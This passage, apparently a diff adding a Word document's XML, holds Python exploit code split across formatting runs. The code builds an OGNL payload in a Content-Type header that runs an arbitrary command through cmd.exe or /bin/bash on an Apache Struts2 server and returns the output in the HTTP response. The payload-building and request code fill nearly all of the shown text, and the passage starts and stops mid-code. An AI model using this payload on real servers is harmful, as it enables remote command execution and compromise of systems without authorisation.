+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>"(#</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>cmd</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>='%s')."</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>%</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>cmd</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>    payload +=</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>"(#iswin=(@</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>java.lang</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>.System@getProperty('os.name').toLowerCase().contains('win')))."</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>    payload +=</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>"(#cmds=(#</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>iswin?{</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))."</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>    payload +=</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">"(#p=new </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>java.lang</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>.ProcessBuilder</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>(#</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>cmds</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>))."</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>    payload +=</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>"(#</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>p.redirectErrorStream</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>(true)).(#process=#</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>p.start</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>())."</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>    payload +=</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>"(#ros=(@</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>org.apache</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>.struts2.ServletActionContext@getResponse().getOutputStream()))."</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>    payload +=</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>"(@</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>org.apache.commons.io.IOUtils</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>@copy(#process.getInputStream(),#ros))."</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>    payload +=</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>"(#</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>ros.flush</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>())}"</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>    try:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>        headers =</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>{'User-Agent': 'Mozilla/5.0', 'Content-Type': payload}</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>        request =</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>urllib2.Request(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>url</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>, headers=headers)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>        page =</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>urllib2.urlopen(request</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>).read</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>()</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>    except</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>httplib.IncompleteRead</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>, e:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>        page =</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>e.partial</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>    print(page)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>    return</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
